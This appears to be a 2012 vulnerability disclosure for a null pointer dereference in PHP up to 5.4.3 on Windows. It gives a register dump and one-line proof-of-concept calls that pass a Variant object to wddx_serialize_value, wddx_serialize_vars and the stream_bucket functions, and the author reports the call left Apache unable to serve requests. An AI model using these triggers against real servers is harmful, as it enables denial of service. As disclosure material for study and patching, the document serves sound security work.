PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce
Author : condis
Date : 10.04.2012 AD
Website : http://cond.psychodela.pl
Download : http://php.net/downloads.php
Tested on:
PHP 5.3.8+ Windows XP SP3 Professional PL
PHP 5.3.10 + Windows XP SP3 Professional PL
PHP 5.4.0+ Windows XP SP3 Professional PL
PHP 5.4.3+ Windows XP SP3 Professional PL
wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant
object when it is given as a first argument.
EAX 00000000
ECX 1056AAE8 php5ts.1056AAE8
EDX 100EFCE0 php5ts.100EFCE0
EBX 01032AB0
EBP 00000000
ESI 0121E478
EDI 0121CB50
EIP 1028F22E php5ts.1028F22E
1028F22E 8A45 25MOV AL,BYTE PTR SS:[EBP+25]
Situation looks pretty much the same for both wddx_serialize_vars and
wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append
have some problems with handling Variant object when given as a second argument:
stream_bucket_append(1, new Variant(1));
stream_bucket_prepend(1, new Variant(1));
PS : Variant object is only available in PHP for Windows OS and it was implemented
in PHP > 4.1.0 and PHP 5.
For more details check : http://php.net/manual/en/class.variant.php
PS2: After running this via webserver my Apache wasn't able to handle requests
anymore and I had to restart him :)
wddx_serialize_value(new Variant(666));